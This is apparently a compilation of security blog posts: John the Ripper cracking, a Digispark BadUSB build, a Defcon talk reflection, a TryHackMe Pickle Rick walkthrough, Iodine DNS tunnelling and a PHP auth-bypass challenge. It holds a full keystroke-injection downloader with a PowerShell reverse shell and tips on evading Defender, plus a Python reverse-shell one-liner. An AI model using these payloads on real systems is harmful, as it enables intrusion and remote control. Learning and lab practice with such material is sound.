Hacking Tools: John The Ripper

Hello World and welcome to HaXez, the game’s afoot and in this post, I’m going to be talking about my favorite password-cracking tool, John The Ripper. John the Ripper is a multi-platform password cracking tool that can crack various password hashes. It was developed by OpenWall and was initially released in 1996. I believe John The Ripper got its name from another hacking tool called Jack The Cracker, or Cracker Jack. Anyway, you’re not here to read a reworded Wikipedia article.

Installing John The Ripper

John The Ripper should come preinstalled on most penetration testing Linux distributions. However, your package manager may have it if your distribution didn’t come with it preinstalled. For Debian-based distributions you can run:

sudo apt-get install john
Installing John The Ripper
Installing John The Ripper

If your package manager’s repositories don’t have John then you can install it from GitHub by using Git Clone. Then once it’s installed you can view the documentation by either running john -h or by looking at the man pages.

John The Ripper Features

As mentioned, John can crack a variety of different password hashes. You can see exactly which hashes he can crack by running the list formats command. This command is also helpful when trying to manually specify a hash type. If you’re in an exam and have forgotten how to ask John to crack a raw MD5 hash, then this command could help.

sudo john --list=formats
John The Ripper List Formats
John The Ripper List Formats

The functionality doesn’t end with mere password cracking though. John has a variety of tools to aid you in the heinous slaughtering of innocent password hashes. These additional tools can normally be found in your /usr/bin or /opt/john/src/ directories. Furthermore, these tools can be used for things like extracting hashes from password-protected ZIP or RAR archives.

Additional John Tools
Additional John Tools

John The Ripper Cracking Modes

John has a number of different password hash cracking modes. These various modes can be used to crack password hashes in different ways. If one method of cracking a password hash didn’t work, then you could try a different mode.

Wordlist Mode

By far the most common mode I’ve used is the wordlist mode. This mode requires the user to specify a wordlist. This wordlist could be bespoke and created by tools like Crunch. Or it could be one of the many wordlists available on the internet. John will then go through the list line by line attempting to match the hash to the word. This mode also offers a mangle option where it will apply rules to the word. In short, the word password could be automatically mangled to something like [email protected]

Single Crack Mode

As stated on the Openwall (John Developers) website, the single crack mode is the cracking mode you should start with. It will use login names, full names, and user home directory names as candidate passwords. It will then apply a large set of mangling rules. Successfully cracked passwords will also be tried against any other hashes that have been loaded. In theory, this mode should be able to crack a list of password hashes faster than if you were to supply the hashes separately.

Incremental Mode

This mode will try all possible character combinations. This is a powerful mode but would likely take longer than using a wordlist. If it tries all possible character combinations then it would eventually guess the correct password. If you know the length of the password then you can specify it to make cracking quicker. However, if you don’t know the length of the password and the password is a fairly long and complex one, then you could be waiting a while… like forever.

External Mode

From what I’ve read and what I understand, I believe this mode requires you to create your own cracking mode. The program code is a subset of C and would be compiled by John at startup. This could be useful if the hashing algorithm used to create the hash is bespoke. You could then write your own cracking module and load it into john to crack those custom-created hashes.

Identifying Hashes

John The Ripper will automatically attempt to identify the hashes that you give him. However, this can be prone to error. Fortunately, there are plenty of tools out there that you can use to identify password hash types. One such tool is hash-identifier which will come preinstalled or should be installable via your package manager or via cloning it from GitHub. To run the tool you simply type the name and then it will ask you to submit your hash. It will then spit out a list of hash types in the order of likelihood. Then you can use that information to manually tell John what type of hash you want to crack.

Hash Identifier
Hash Identifier

Getting Wordlists

A question I get asked a lot is where I get my word list from. Well, there are many locations. Most penetration distributions come with a wordlist preinstalled. However, you can download them from the internet. One particular wordlist that I would like to shine a light on is seclists. Seclists is available from GitHub and has almost every type of wordlist you could ever want. For the purposes of this demonstration, I will be using the rockyou.txt wordlist from the rockyou.com data breach.

Seclists
Seclists

Cracking MD5 Hashes With John The Ripper

As mentioned earlier, John can crack a variety of password hashes. The example below shows how you can crack an MD5 hash. An MD5 Hash or MD5 message-digest algorithm is cryptographically broken but still commonly use having a function that produces a 128-bit hash value. MD5 was originally designed by Ronal Rivest in 1991 as a method of replacing MD4 hashes. I used the following syntax to crack the MD5 hash.

sudo john --format=raw-md5 --wordlist=rockyou.txt hash1.txt
John The Ripper Crack MD5 Hash
John The Ripper Crack MD5 Hash

Cracking SHA1 Hashes With John The Ripper

The next hash that somehow managed to sneak its way into my directory is a SHA1 hash. SHA1 is a cryptographically broken encryption cipher that was originally designed by the National Security Agency. It was initially released in 1993 and produces a 160-bit hash. The following syntax shows how you can crack a SHA1 hash.

sudo john --format=raw-sha1 --wordlist=rockyou.txt hash2.txt
Cracking SHA1 Hashes With John The Ripper
Cracking SHA1 Hashes With John The Ripper

Cracking SHA256 Hashes With John The Ripper

Where did this hash come from? never mind, I’m sure our friend John can dispatch it fairly quickly. SHA256 is another cryptographically broken hashing algorithm that was developed by the National Security Agency (it’s almost as if they were designing them to fail).

sudo john --format=raw-sha256 --wordlist=rockyou.txt hash4.txt
Cracking SHA256 Hashes With John The Ripper
Cracking SHA256 Hashes With John The Ripper

Cracking Whirlpool Hashes With John The Ripper

What’s that? no secret is safe? Well if you use a crappy password and someone is able to obtain your password hash then you aren’t far from the truth. have you considered doing a password audit of your employee’s passwords to ensure they are secure? Maybe now is a good time. The syntax below shows how you can crack Whirlpool hashes. Whirlpool is a broken cryptographic algorithm designed by Vincent Rijmen and was first published in 2000.

sudo john --format=whirlpool --wordlist=rockyou.txt hash4.txt
Cracking Whirlpool Hashes With John The Ripper
Cracking Whirlpool Hashes With John The Ripper

Cracking MD4 Hashes With John The Ripper

MD4 hashes are outdated but you would be surprised to see how many organizations still use broken and outdated cryptographic algorithms. MD4 is a cryptographically broken encryption cipher originally developed by Ronal Rivest and first published in 1990. The syntax below shows you how to crack passwords encrypted with MD4 hashing algorithms.

sudo john --format=raw-md4 --wordlist=rockyou.txt hash5.txt
Cracking MD4 Hashes With John The Ripper
Cracking MD4 Hashes With John The Ripper

John.pot

Did I just rickroll you via password hashes? well yeah, I did and I refused to apologize. This post took me a day to write up and unfortunately you have to deal with the consequences. So, what happens to all the password hashes that get cracked by john? Well, they get stored in a file called john.pot. You can use locate on your system to find this but it is usually located in /root/.john/john.pot. If you’re trying to crack a hash but are getting an error message then it is likely you have already cracked it. Deleted the john.pot file or remove the line with the cracked has in order to re-crack the file.

sudo cat /root/.john/john.pot
John.pot
John.pot

Conclusions

John The Ripper is a fantastic tool that is near and dear to my heart. Yes, there are alternatives such as Hashcat but this is a mainstay of cybersecurity. It does what it needs to do and provides a simple way of doing it. It is one of my favorite tools for hacking and I will continue using it until it is no longer feasible to do so. I realize I have only scraped the surface on the functionality of John The Ripper but this post isn’t meant for advanced usage, it is merely a guide on how to get started with John The Ripper. So get slaying and let me know how you get on.

Hack Any Computer In 2 Seconds With This £2 Device | Digispark

Hello World and welcome to HaXeZ. In this post, I will be discussing the Digispark. With the right payload, the Digispark can hack any computer in 2 seconds. I realize that’s a bold claim to make and is definitely a clickbait title but it isn’t far from the truth. The Digispark, like the Hak5 USB Rubber Ducky, is a keyboard emulator that can inject keystrokes on the target computer at breakneck speeds. Therefore, anything a hacker can do on a keyboard, the Digispark can do too but arguably faster. So, If you’re having trouble getting hold of a Hak5 USB Rubber Ducky then this could be the device for you. For about £2 and a bit of time, you can build your own Rubber Ducky from a Digispark. I’ve written another article using a different board, feel free to check that one out here.

Arduino Integrated Development Environment

The first step in creating your very own DIY USB Rubber Ducky super hacking tool is to download the Arduino Integrated Development Environment. This can be downloaded from the following URL https://www.arduino.cc/en/software. Simply visit the URL, click the download link, double-click the downloaded file and then follow the installation wizard.

Arduino Integrated Development Environment
Arduino Integrated Development Environment

Configuring Arduino IDE

Once you have installed the Arduino IDE, you need to configure it so that it can write your payloads to the Digispark. In order to do this, first launch the Arduino IDE then head to File, then Preferences, then paste the following URL into the Additional Boards Manager URLs input box. This allows the Arduino IDE to work with third-party boards such as the Digispark.

http://digistump.com/package_digistump_index.json

Digispark Additional Boards Manager URLS
Digispark Additional Boards Manager URLS

Install Digispark AVR Boards

Next, you need to install the Digistump Digispark boards so that the Arduino IDE knows how to talk to your board. To do this, head to Tools, Board and click Boards Manager. Then from the drop-down menu select contributed and search for the Digistump AVR Boards. There should be an install button, click that and wait for the boards to finish installing.

Arduino Boards Manager
Arduino Boards Manager

Digispark Drivers

That should be everything you need. However, if Windows is having trouble recognizing your board then you may need to install the drivers manually. You can find these by performing a quick Google search for “Digispark Arduino Drivers”. This should take you to the following GitHub page which has a download link labeled Digistump.Drivers.zip. Download, extract and install these drivers.

https://github.com/digistump/DigistumpArduino/releases 
Digispark Drivers
Digispark Drivers

Digispark Payloads

Now that you’re Arduino IDE is set up and the drivers are installed, it’s time to find some payloads. There are tons of payloads available on the internet that do various things. These payloads range from performing a fake Windows update while playing Never Gonna Give You Up by Rick Astley to launching a Fork Bomb on the target system. I hope it goes without saying that some of these payloads can be dangerous and you should exercise caution when playing with them. The following GitHub repository has some good payloads to practice with.

https://github.com/CedArctic/DigiSpark-Scripts
Digispark Payloads
Digispark Payloads

Reverse Shell Downloader Payload

The payload I’m going to be focusing on is the Powershell reverse shell payload. You can see from the script below that this is a fairly simple script. It starts by sending the Windows Key and R to the computer. This opens the Run dialog box. After a brief delay, it types out “powershell.exe” into the Run dialog box and then sends the Enter key. This spawns a new Powershell window. In the new Powershell Window, it types out a command to download another payload from a URL. After a brief delay, it then executes the payload.

// This script downloads and executes a powershell script efectively opening up a reverse shell in less than 3 seconds. 
// Credits to hak5 and samratashok (developer of the nishang framework).

#include "DigiKeyboard.h"
void setup() {
}

void loop() {
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("Invoke-WebRequest -Uri 'https://haxez.org/payload.ps1' -OutFile 'payload.ps1'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("./payload.ps1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for (;;) {
    /*Stops the digispark from running the scipt again*/
  }
}

Powershell Reverse Shell Payload

Please note that the following Powershell script will probably be caught by Windows Defender. However, with some tinkering like renaming variables and obfuscating the code, it may not be detected. I won’t be attempting to do that in this walkthrough. The following script is a reverse shell that will attempt to connect back to the IP address and port that you specify. This script will need to be uploaded to a server that you control and then the location of the script needs to be added to the downloader payload above.

#A simple and small reverse shell by samratashok's Nishang framework. Change the Host IP Address and Port according to your setup as described in the README file of the script. 
$sm=(New-Object Net.Sockets.TCPClient("192.168.0.23",4243)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the downloader payload to the Digispark. It’s important that you don’t plug in the Digispark first. First, paste your code into the Arduino IDE and then click the upload button. This will then spawn a terminal at the bottom of the application prompting you to plugin the device. You should now be able to plug in your Digispark. Once the terminal reads 100%, the payload will automatically execute. Probably best if you don’t try to use any payload that can potentially damage your computer.

Upload Payload To Digispark
Upload Payload To Digispark

Digispark Demonstration

With the payload written to the Digispark, it’s time to test it out. Ensure that you have uploaded the reverse shell payload to your web server and that the path has been amended in your download payload. Then set up a net cat listener or some other listener on your attack machine (the machine you want to connect back to) and plug the Digispark into the target machine. As mentioned previously, this will only likely work with Defender disabled unless you have modified your payload. However, please see the video below of a demonstration.

PwnHub Digispark Demonstration

Conclusions

The Digispark is a fantastic affordable device that has a lot of flexibility. The price alone is enough to justify owning one and tinkering with it. Granted the introduction about it being able to hack a computer in 2 seconds is a bit of an exaggeration but I hope you can see the potential from the write-up. You can use it for automation rather than hacking. You can tell it to do anything a keyboard can do provided the payload fits on the 6000kb chip. I had a lot of fun with it and will be keeping a few preconfigured ones in my hack bag at all times… just in case. Anyway, check out the video below for a more hands-on demonstration.

My First Defcon Talk

Hello World and welcome to HaXeZ. This week has been interesting. Not only am I going to Bsides on Saturday but yesterday (Thursday), I performed my first Defcon talk at DC441242 and DC441452. I know it isn’t much to brag about but I consider it a personal achievement. I’m sure I’m not alone in saying that coming out of lockdown left me with a few social anxieties.

Having not been out socializing for a while, I’ve found myself avoiding social situations. Not so much because of the virus, but more because of wanting to stay within my comfort zone. That’s the problem with comfort zones, they are comfortable. However, staying in your comfort zone rarely allows you to achieve much.

Local Defcon
Local Defcon

Nerves at Defcon

I’ve always wanted to do a Defcon talk, it’s been on my bucket list for a while. However, the pandemic happened and meetings were postponed or done through Zoom. Given the number of video quizzes I did during the lockdown, I didn’t fancy it. I wanted to do it in person but with that comes nervousness. Despite how confident they are, anyone who has even performed public speaking before probably felt nervous. I remember giving the best man speech at my brother’s wedding and having my heart race the entire time. So why shouldn’t I throw myself to the wolves and deliver a cybersecurity talk to a room full of cybersecurity professionals?

With that said, I was surprised as I wasn’t feeling nervous at all. Sure, during the day leading up to the up to it I was, but being there and doing it, I was fine. I have been to a few of these events before so recognized a few people. I also asked a few of my friends to come (Thanks Jay, Mark, and Bob). During the presentation, there were moments where I fumbled my words or couldn’t explain things how I wanted to but I don’t think anyone noticed.

Anxiety at Defcon
Anxiety at Defcon

Imposter Syndrome

You know what I’m talking about. I’m sure others have it in different professions but I feel like it is prolific in the IT industry. I had it when I was doing tech support before I popped my first shell. I have it now even though I’ve been in IT for over a decade. It’s the feeling that you don’t belong somewhere, that you don’t fit in, that you’re faking it. That everyone else is a billion times smarter than you and will make fun of you for being a noob. Here’s the thing, everyone was once where you are today. Whether you’re at the beginning of your journey or have been doing it for years. Someone somewhere will know something you don’t. That’s ok, actually, that’s great, it means there is more to learn. Nobody knows everything (is that a double negative?).

The people at my local Defcon were great, they let me do my presentation and were an easy audience to talk to. They looked engaged the whole time and put me at ease. At the end of the presentation, they asked me a few questions about the techniques. To be honest with you, I didn’t know the answers to a lot of them. Again, that’s ok, it gives me something to go home and research. Some of the questions I felt I should have known but others I hadn’t even thought about. This is how we grow, we invite challenges into our lives and overcome them. We get feedback from other people and view things from different vantage points.

Imposter Syndrome
Imposter Syndrome

My Defcon Talk

I’m not sure if I will ever overcome imposter syndrome but honestly, I’m not sure I want to. I would rather feel like an imposter and push myself to learn something new every day than feel like I know everything and take my foot off the gas.

On to my talk, if you watch my Youtube videos then you may have seen one I did recently about DNS tunneling. It isn’t a revolutionary hacking technique, nor is it a new one. However, I thought it was cool. I presented it at a virtual work meeting on a Friday afternoon and people seemed to enjoy it so I thought why not take it a step further. Local Defcon groups are always looking for people who want to present and it just so happened that my local one had an opening. I spoke with the organizers and they were happy to have me.

The point I’m trying to make is, if you want to do something like this but are worried that people have heard it all before, don’t be. You will be presenting it from a different perspective and that could be the perspective that someone needs to understand something. Go for it.

Better Than Expected
Better Than Expected

Final Thoughts

So what’s next? well, I would like to do another talk in the future. I’m currently working on a video about the digi spark board. I’m going to be programming it to be a cheap alternative to the USB rubber ducky. I’ve written a similar post where I used a CJMCU but that was a bit more expensive and used a Micro SD card. Perhaps that is something I could talk about, or perhaps I could talk about the Flipper Zero when it arrives (oh yes! I ordered one).

Either way, I wouldn’t hate it if I became a regular talker. I feel like it is something I could do to give something back to my local community. It’s a great way to make connections and learn new things. If you’re into hacking or security in general, you should definitely check out your local Defcon if you have one. It could be the stepping stone you need to land your first Cybersecurity job or just a way to make new friends with similar interests. My local Defcon did a talk about lock-picking once and had a bunch of locks and lock-picking toys for everyone to play with. It was great.

Anyway, I’m now someone who has spoken at a local Defcon. Not going to lie, it feels good.

Thanks for reading.

I’M PICKLE RICK! wubba lubba dub dub | TryHackMe

Hello World and welcome to HaXeZ, in this post I’m going to be doing the Pickle Rick room on TryHackMe. This is a fun easy room that requires some basic enumeration and then web application exploitation via code execution.

PICKLE RICK!
PICKLE RICK!

Scanning Pickle Rick

Ok, so the first thing we need to do is scan the box. To do that we’re going to use our favorite tool Nmap. As seen below, I ran the Nmap scan with the “-sC” flag set for safe scripts. The “-sV” flag set for service versions and then I specified all ports with “-p0-” and then gave it the IP address. As you can see, the results of the Nmap scan show that there are only two ports listening. Port 22 for Secure Shell and port 80 for an Apache Web Server.

sudo nmap -sC -sV -p0- 10.10.118.227 -T4
Nmap Scan of Pickle Rick
Nmap Scan of Pickle Rick

Exploring The Web Server

As it was unlikely that the room creator wanted us to brute-force SSH, I headed over to the web server. Show Me What You Got!. Upon visiting the web server I was greeted with a Rick and Morty themed website. Furthermore, it looks as though Rick has left Morty a message asking him for help.

Pickle Rick Web Server
Pickle Rick Web Server

Additionally, viewing the page source of the application revealed the username of R1ckRul3s within an HTML comment. The page source also gave away the location of the assets folder. As can be seen, the CSS and Javascript files were being called from the assets directory.

Pickle Rick Page Source
Pickle Rick Page Source

Navigating to the assets directory didn’t reveal much more information. However, it did have directory listening enabled. If this was a web application security assessment, I would definitely report this. While the information contained in the directory doesn’t any sensitive information now. It could do in the future.

Web Server Directory Listing Enabled
Web Server Directory Listing Enabled

Pickle Rick Foothold

After a bit more poking around, I stumbled upon the robots.txt file. Normally these files are used to tell web servers not to index certain pages. However, this one appeared to contain the string “Wubbalubbadubdub”. At first, I thought it was nonsense, but it is not nonsense at all. In bird person’s native tongue it means “I am in great pain, please help me”. References aside, this is the password that goes with the “R1ckRul3s” username we found earlier.

Robots.txt Wubbalubbadubdub
Robots.txt Wubbalubbadubdub

I ran dirb with a custom wordlist against the web application and found a login.php page. Admittedly, I should have found this page without dirb. When doing web application assessments, it’s a good idea to look for login pages with the extension being used (PHP, ASP, ASPX).

Pickle Rick Login PORTAL ha
Pickle Rick Login PORTAL ha

Most of the pages were protected and could only be accessed by the Rickest Rick or something. However, I was able to access the commands page. This allowed me to run commands such as “ls” to see the contents of the current directory. It was there I discovered the first ingredient in a text file called “Sup3rS3cretP1ckl3Ingred.txt” or something. I wasn’t able to use “cat” on the file, likely due to command blacklisting. However, I could use “less” on the file which gave me the first ingredient.

Web Application Command Execution
Web Application Command Execution

Popping Shells

As we have now confirmed that command execution is possible. We should be able to get a reverse shell from the application back to our hacker machine. To do this I visited the PayloadsAllTheThings GitHub repository and stole a python one-liner.

GitHub PayloadsAllTheThings
GitHub PayloadsAllTheThings

Next, using NetCat I opened a portal to dimension 4242 (because of the meaning of life) on my attacker machine. This is the portal that our snake payload is going to come through once executed by the web application. I’m well aware that there are hundreds of better snake jazz jokes I could make here but cba.

sudo nc -lvnp 4242
NetCat Listener

Finally, I modified the snake one-liner to change it to python 3. I also change the localhost address to the address of my tun0 TryHackMe VPN IP address. I then copied the payload and pasted it into the command input box and hit the execute command.

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Web App Command Execution
Web App Command Execution

Pickle Rick Privilege Escalation

Sure enough, the portal to dimension 4242 was opened. The snake army commenced their invasion of the Pickle Rick web server. They slithered around for a bit and found that they had landed on the server as www-data. However, www-data had sudo privileges to do everything without a password. They used these privileges for their own nefarious purposes and elevated their privileges to root. From there they were able to capture the second ingredient found in the /home/rick directory. They then advanced to the /root directory where they were able to steal the third ingredient. It was only a matter of time before they turned Rick back into a human and took over the world.

Rooted
Rooted

Conclusions

This was a really fun box, I always try not to use words like really and very in my writing as they are unnecessary. However, this box was really fun. I probably enjoyed it more because I am a BIG (again unnecessary wordage) fan of Rick and Morty. I’m also a sucker for boxes with a strong theme as I love the added immersion that it adds. While this box was listed as easy, I do feel the privilege escalation could have been harder. Would have loved to have had to escalate to the Rick user first. And then to root by using a bespoke Rick and Morty themed science binary with unquoted binary paths or something. Perhaps the simplicity of it is what made me enjoy it more, who knows. Anyway, that’s all I have for you. Please check out the video to give me more views, and subscribe if you want.

Conclusions
Conclusions
Pickle Rick Video Walkthrough

Data Exfiltration, Firewall Evasion, and DNS Encapsulation with Iodine

Hello World and welcome to HaXeZ. Today I want to talk about the DNS tunneling software Iodine.  Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.

Scenario

Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?

Solution

Why would ping be able to resolve your domain names IP address but not be able to ping it? Other than the obvious ICMP packets being blocked, it could be that the network administrator has blocked all traffic except DNS. This is a common configuration to allow DNS resolution on the network, but fortunately, it is also susceptible to abuse. By using the DNS tunneling software Iodine, we can establish a tunnel to an external host and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I’m going to be using a Debian-based cloud server. Furthermore, You will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to 37.120.198.179 (it’s a VPN before you ask).

My Current IP Address before Iodine
My Current IP Address before Iodine

Iodine Domain Configuration

For this demonstration, I’m going to be using my spare domain haxr.one. It is currently registered with google and is using their nameservers. I don’t use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record of dnstunip which points to my Debian server’s IP address of 185.132.43.9. I then create an NS (nameserver) record of dnstun and point it to the A record (dnstunip.haxr.one).

Iodine DNS Records
Iodine DNS Records

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That’s it, that’s all the installation you need to do unless Iodine isn’t found in the repositories. If that happens, you can clone it directory from the GitHub repository but they have documentation on how to do that. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain. In order to do this, you need to run iodined (the server-side software). As you can see from the screenshot below I have started iodined and set the password of SecretPassword1337, the local IP address of 10.0.0.1, and the domain of dnstun.haxr.one. The local IP address is the IP address that the DNS tunnel is going to use to communicate with the client.

sudo iodined -f -c -P SecretPassword1337 10.0.0.1 dnstun.haxr.one
Iodine Server Set Up
Iodine Server Set Up

You should now be able to check that your Iodine server is set up correctly by visiting https://code.kryo.se/iodine/check-it/ and popping in your domain name.

Checking Iodine Server Configuration
Checking Iodine Server Configuration

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine, -f -P SecretPassword1337 dnstun.haxr.one. 

Where the password is your password and the dnstun.haxr.one is your domain. This will then send DNS queries to the server to determine whether it can communicate with it. The client and server will then determine the upstream and downstream configurations and finally create the tunnel. The client should now have a new network interface called dns0 or something similar. The IP address of that interface will be set to an IP within the range that you specified on the server (10.0.0.X). That’s it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

Iodine Client Set Up
Iodine Client Set Up

It’s also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn’t normal. However, Wireshark doesn’t seem to think there is a problem with it and unless there are devices on the network configured to look for this type of traffic then it probably won’t get flagged.

Wireshark PCAP
Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There’s an SSH trick for that. If you SSH to the DNS tunnel servers IP address (10.0.0.1) and specify a few arguments, you can dynamically port forward traffic to your localhost. This means that by setting a proxy configuration in your browser to localhost and the specified port, you can browse the web. The command is:

sudo ssh -N -D 9090 [email protected] 

where 10.0.0.1 is the IP address of the server’s DNS tunnel IP and 9090 is the local port you want to forward to. The -N argument just means no command execution and the -D argument is the dynamic port forwarding flag that makes the magic happen.

SSH Dynamic Port Forwarding
SSH Dynamic Port Forwarding

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

Browser Proxy Settings
Browser Proxy Settings
What is my IP showing the IP of the server
What is my IP showing the IP of the server

Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their client’s data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

Mitigations

How do you mitigate a service that is behaving as it is expected to? Well, there are actually a number of options. First, you could add domain allow and block lists to your configuration. By blocking known malicious domain names, you ensure that a DNS tunnel can’t be established to that domain name. However, a hacker could just register a new domain name and use that. A better approach is to use an allow list whereby only traffic from specific domains is allowed into the network.

An even better approach is to implement a device that performs traffic/packet inspection. There are a number of devices out there that will identify malicious DNS traffic and block it. You saw from the Wireshark screenshots that the DNS tunnel traffic stands out like a sore thumb. It is easily distinguishable from genuine DNS traffic.

Conclusions

I thought this was a fantastic technique when I first come across it. A colleague/friend of mine recommend it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn’t think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

Hacking PHP Web Applications and Bypassing Authentication Mechanisms | Hack This Site – ExtBasic 6

Hello World and welcome to HaXeZ, today we’re going to be looking at Hack This Site ExtBasic 6. Solving this challenge requires some basic knowledge of PHP or any other language for that matter. It’s a simple challenge that shows how poorly coded web application authentication mechanisms can be bypassed.

The Challenge

The image below shows the PHP that makes up the authentication mechanism. Furthermore, This is the code that we need to exploit in order to bypass the authentication mechanism. The introduction text at the top explains that the sysadmin is a noob and that the script is located at http://moo.com/moo.php. Therefore, to solve this challenge we need to append the correct syntax to the end of the URL and submit it to the submission form.

The PHP Code
The PHP Code

The PHP Code

The snippet below is the exact code we’re going to be exploiting. Furthermore, there is no backend database to worry about, just some simple PHP logic that we can leverage for our own nefarious purposes.

<?php
        $user = $_GET['user'];
        $pass = $_GET['pass'];
        if (isAuthed($user,$pass))
        {
                $passed=TRUE;
        }
        if ($passed==TRUE)
        {
                echo 'you win';
        }
?>
        <form action="me.php" method="get">
        <input type="text" name="user" />
        <input type="password" name="pass" />
        </form>
<?php
        function isAuthed($a,$b)
        {
                return FALSE;
        }
?>

Breaking Down The Code

We’re going to break the code down line by line in order to solve this challenge. Once we understand what the code is doing, we will be able to use its own logic against it and bypass authentication.

First, the code starts with it a tag telling us what language it is.

<?php

Next, we have two variables being set from user input. The $user and $pass variables are populated by the values of ‘user’ and ‘pass’. This is more evident later on when looking at the HTML form.

$user = $_GET['user'];
$pass = $_GET['pass'];

This is where the logic beings. When the user submits their username and password, the data is passed to an if statement. If the values of the variables ‘$user’ and ‘$pass’ are correct then the variable ‘$passed’ is set to true.

if (isAuthed($user,$pass))
{
        $passed=TRUE;
} 

After that, the application uses another if statement to check whether the value of the variable ‘$passed’ is set to true. If ‘$passed’ is set to true then the application echos out “you win”. This also ends the first section of PHP.

if ($passed==TRUE)
{
        echo 'you win';
}
?>

Now, we move on to the HTML. This is the login form that the user will send when loading the page in their browser. It is fairly standard and just performs a get request to me.php. The contents of the get request or the values of the input for ‘user’ and ‘password’. The user input type is text and the password input type is password.

<form action="me.php" method="get">
<input type="text" name="user" />
<input type="password" name="pass" />
</form>

Finally, we have the last section of PHP. This is the function that checks to see whether the username and password are correct. This function compares the values of variables ‘$user’ and ‘$pass’ with the variables ‘$a’ and ‘$b’. If they match then it is the first if statement is executed.

<?php
        function isAuthed($a,$b)
        {
                return FALSE;
        }
?>

The Solution

With that rather long explanation out the way, we can now move on to solving the challenge. It’s pretty simple if you know how to PHP site URL’s work. We know that in order for us to authenticate, the variable ‘$passed’ needs to be set to ‘TRUE’

PHP allows you to specify variables and their contents in the URL. For example, a dynamic PHP website using a CMS like WordPress may have a URL like HTTP://site.com/index.php?page=1. The question mark indicates that what follows is a variable and in this case, the variable is ‘$page’. Furthermore, we can specify that we want the value of the page variable to be 1.

With this in mind, we can take the provided URL of HTTP://moo.com/moo.php and append a question mark followed by the variable passed equals TRUE, as seen below.

http://moo.com/moo.php?passed=TRUE

Submitting this to the input box will solve the challenge.

Domain Name System Simplified

Hello world, and welcome to HaXeZ. Today I want to talk about the Domain Name System (DNS). I know, I know, most of you probably already know how DNS works. However, I’m going to be writing an article soon about Firewall Evasion and Data Exfiltration through DNS Tunnelling and I needed to brush up on my DNS knowledge. Never wanting to waste an opportunity, I thought it would make for a good blog post and video so here we are.

What Is The Domain Name System?

Domain Name System or DNS is a hierarchical system for translating text to IP addresses. It relies on various nameservers at various levels. A nameserver is a server that holds records for domains whether they are top-level domains (TLD) or fully qualified domains (FQDN). At the very top of the hierarchy are the root servers. These root servers hold the DNS record information for the top-level domains. This information is stored in something called a zone file. You can perform a DNS zone transfer using many tools, the example below uses Nmap.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja
DNS Zone File
DNS Zone File

The zone file contains entries such as the nameservers for the top-level domains. Underneath the root nameservers are the top-level domain nameservers. The same principle applies here in that the top-level domain nameservers contain information about the fully qualified domain nameservers. At the bottom of the hierarchy is the domain’s authoritative nameservers which contain records such as A, MX, NS, TXT, and many others.

What Is The Domain Name System?
What Is The Domain Name System?

Domain Structure

If we look at the web address haxez.org we can see that it has multiple sections. You may not know about the first section as it doesn’t tend to be represented by anything. In some cases, it can be represented by a full stop but most Domain Name System nameservers don’t require the full stop in order for it to work. The full stop comes at the end of the ‘.ORG’ section and signifies a root nameserver. Root nameservers hold the IP addresses of the top-level domain (TLD) (COM, NET, ORG,) nameservers. The ‘ORG’ section of the address is a top-level domain. The ‘haxez’ portion of the address is the domain. Anything that comes before haxez.org would be a subdomain. For example, www.haxez.org where www is the subdomain, and haxez is the fully qualified domain.

Domain Name System Domain Structure
Domain Name System Domain Structure

How Does The Domain Name System Work?

